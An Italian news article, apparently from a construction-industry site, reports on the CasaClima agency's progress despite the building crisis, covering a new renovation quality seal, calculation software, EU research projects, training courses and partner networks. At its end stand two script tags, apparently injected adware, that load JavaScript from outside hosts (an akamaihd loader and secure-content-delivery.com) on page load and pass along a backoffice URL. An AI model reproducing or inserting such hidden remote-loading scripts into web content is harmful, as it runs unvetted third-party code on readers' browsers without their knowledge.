1. Home
  2. Notizie e Mercato
  3. CasaClima: sviluppo incoraggiante nonostante la crisi

CasaClima: sviluppo incoraggiante nonostante la crisi

Energie rinnovabili di
5/5
votato da 1 persone
Per l’Agenzia Casa


Dalla sua istituzione la certificazione CasaClima ha introdotto nuovi parametri di risparmio energetico e di tutela del clima e dell’ambiente nell’edilizia, spianando la strada a innumerevoli innovazioni tecniche nel costruire e risanare. In un contesto economico difficile l’Agenzia è riuscita a impostare nuove proposte di soluzione alla crisi del settore attraverso uno sviluppo dell’offerta in continua evoluzione. Il lancio del nuovo sigillo di qualità “CasaClima R” per il risanamento risulta in questo contesto particolarmente promettente. Alla luce del continuo spostamento degli investimenti nel settore della riqualificazione dell’esistente il protocollo vuole essere un vademecum per risanare edifici in modo energeticamente efficiente e qualitativamente all’avanguardia e dotarli di un sigillo di qualità. Non ultimo si intende così anche dare un impulso al settore edilizio sofferente e proporre un contributo per superarla.

Un altro traguardo importante è la presentazione del nuovo software di calcolo CasaClima, che aggiunge come novità più importanti per la prima volta la valutazione della progettazione estiva, l’impiantistica e la sostenibilità dell’edificio. Con questo strumento innovativo CasaClima offre ormai una risposta tecnologica alle sfide della tecnologia edilizia e del clima mediterraneo.

Per porre la propria capacità di innovazione su una base più ampia l’Agenzia CasaClima ha partecipato, con successo, a diversi progetti di ricerca europei. Si tratta di iniziative che spaziano dall’efficienza energetica alla verifica di materiali e sistemi innovativi. In questo contesto si è iniziato anche un ampio progetto di monitoraggio per il rilevamento e la valutazione del confort e del fabbisogno energetico reale in un edificio CasaClima.

Nonostante la crisi del settore edilizio le proposte formative confermano in tutta l’Italia la loro attrattività. La molteplicità dell’offerta orientata alla pratica è stata costantemente aggiornata e recentemente ampliata con corsi online. Anche la collaborazione con università ed istituti di ricerca è stata intensificata. Il “Master CasaClima”, frutto della collaborazione con l’Università Libera di Bolzano, è stato completamente rivisto ed è in procinto di debuttare ancora nel corso dell’anno corrente. Diverse richieste per l’attivazione di proposte simili da parte di altri istituti rinomati sono al vaglio dell’Agenzia.

Particolare importanza è stata data allo scambio di competenze tecniche con le aziende partner CasaClima, attualmente 143, che insieme agli oltre mille consulenti CasaClima rappresentano un importante puntello di diffusione del modello CasaClima nel paese. In quest’ottica si pongono anche i recenti accordi di convenzionamento con nuove agenzie dell’energia regionali e la costituzione di cinque nuovi associazioni “CasaClima Network”.

Con il tempestivo recepimento della direttiva europea 2010/31 sull’efficienza energetica nel settore edilizio l’Alto Adige conferma il suo ruolo come “Green Region”. Si tratta di un altro passo sulla via dell’implementazione della visione “KlimaLand Alto Adige” e dei suoi obiettivi di politica ambientale ed energetica.

L’Agenzia CasaClima è un ente pubblico e indipendente della Provincia Autonoma di Bolzano. Valuta e certifica edifici e prodotti secondo criteri di rilevanza ambientale ed energetica. A oggi l’Agenzia ha consegnato la sua targhetta a 5000 edifici. La certificazione CasaClima sta evolvendo sempre più da semplice attesta dell’efficienza energetica a sigillo di qualità  per il costruire e lavorare sostenibile.


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>